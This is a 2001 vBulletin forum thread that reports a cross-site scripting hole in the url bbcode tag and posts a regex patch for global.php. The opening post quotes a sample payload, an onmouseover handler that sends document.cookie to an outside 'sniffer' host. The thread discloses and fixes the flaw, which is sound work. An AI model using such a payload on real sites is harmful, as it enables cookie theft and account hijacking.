Announcement

Collapse
No announcement yet.

Security problem (javascript in urls)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
    Matthijs
    New Member

  • Matthijs
    replied
    This is pretty cheesy, but it works:
    Change line 253 of global.php from: [code]$bbcode=eregi_replace("\\[url\\]([^\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
    to: [code]$bbcode=eregi_replace("\\[url\\]([^\\\"\\[]*)\\[/url\\]","<a href=\"\\1\" target=_blank>\\1</a>",$bbcode);[/code]
    You'll have to insert the \\\" for the email tags too:
    [code]$bbcode=eregi_replace("\\[email\\]([^\\\"\\[]*)\\[/email\\]","<a href=\"mailto:\\1\">\\1</a>",$bbcode);[/code]
    (a few lines down in global.php)
    Matthijs
    New Member
    Last edited by Matthijs; Tue 17 Apr '01, 1:16pm.

    Leave a comment:

  • Matthijs
    New Member

  • Matthijs
    replied
    This is very severe! 1.1.6 is still affected.
    I'm writing my own patch at the moment to stop this one from becoming a disaster.
    Will post it here when i'm done...

    Leave a comment:

  • thetester
    New Member

  • thetester
    started a topic Security problem (javascript in urls)

    Security problem (javascript in urls)

    If you take a look at my signature, you will see an example on javascript in the url vB code tag, that can cause serious security problems. I have only tested this on 1.1.4, but the admins on that board had to close down vB code totally to fix the security problem caused by things like onmouseover="window.open('sniffer.com/script?'+encode(document.cookie));
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X